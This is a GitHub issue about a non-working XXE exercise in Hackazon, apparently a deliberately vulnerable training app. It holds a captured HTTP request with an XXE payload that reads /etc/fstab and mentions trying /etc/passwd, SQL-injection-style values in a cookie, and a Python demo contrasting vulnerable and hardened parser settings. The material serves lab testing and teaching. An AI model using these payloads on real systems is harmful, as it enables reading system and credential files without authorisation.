This repository has been archived by the owner on May 18, 2021. It is now read-only.

Issues with XXE #25

Open
artsalmon opened this issue Apr 8, 2020 · 0 comments

Comments

@artsalmon

artsalmon commented Apr 8, 2020

XXE vulnerabilities seem not to be functioning.

I have verified that XXE is enabled in the vulnerabilities.md file. I have also logged in to the admin page and ensured that there are pages on which the XXE vulnerability is enabled. I turned it on in every location that I could, just in case. I verified the PHP files in the config location to ensure that XXE was set to true for the location I needed. I enabled XXE for the Cart/View area.

I set up Burp to intercept the HTTP GET requests, and I captured the request below.

---ORIGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the request to include the XML example code from the vulnerability.

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [<!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<roottag>&goodies;
---END OF CODE---

I have also modified the goodies entity to see if the passwd file would display.

I only get an HTTP 400 error.

I have cleared the cache, I have tried doing this in a VM with no other content, and I ensured that Firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?
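As an added example (this is not Hackazon's code and not from the issue author), the payload from the post is run below through Python's standard-library SAX parser twice: once with external general entity resolution switched on, which is the XXE-vulnerable configuration, and once with it switched off, which is the hardened setting. The SYSTEM target is a constructed temporary file standing in for /etc/fstab, so the script runs offline; the file contents and the `roottag`/`goodies` names are the only assumptions. The point for a test like the one above: the payload only does anything if the request body actually reaches an XML parser with entity resolution enabled, and the two return values make the difference visible.

```python
"""Added example (not Hackazon code): what the XXE payload from the post does
once it reaches an XML parser that resolves external general entities, versus
the same parser with that feature disabled.  Standard library only."""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler

# Same shape as the payload in the post; the SYSTEM URL is filled in per run.
PAYLOAD = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE roottag [<!ENTITY goodies SYSTEM "{url}">]>\n'
    '<roottag>&goodies;</roottag>\n'
)


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data; an expanded external entity shows up here."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def parse(xml_bytes, resolve_external_entities):
    """Parse xml_bytes with the expat-based SAX reader and return its text.

    resolve_external_entities=True mirrors an XXE-vulnerable configuration
    (the default before Python 3.7.1); False is the hardened setting, under
    which the SYSTEM entity is left unexpanded and the file is never read.
    """
    handler = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Run the payload both ways against a constructed stand-in file.

    Returns (vulnerable_text, hardened_text, file_contents).
    """
    # Constructed sample content; it stands in for /etc/fstab in the post.
    secret = "# constructed stand-in for /etc/fstab\nUUID=1234 / ext4 defaults 0 1\n"
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(secret)
    try:
        payload = PAYLOAD.format(url="file://" + path).encode("utf-8")
        vulnerable = parse(payload, resolve_external_entities=True)
        hardened = parse(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return vulnerable, hardened, secret


if __name__ == "__main__":
    vulnerable, hardened, secret = demo()
    print("entity resolution on :", repr(vulnerable))
    print("entity resolution off:", repr(hardened))
```

With resolution on, the text of `<roottag>` is the file's contents; with it off, the entity is skipped and the text is empty. A 400 returned before any parsing happens gives no way to tell these two outcomes apart, so the first thing to confirm in a test like the one in the post is that the chosen endpoint reads and parses the request body at all.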
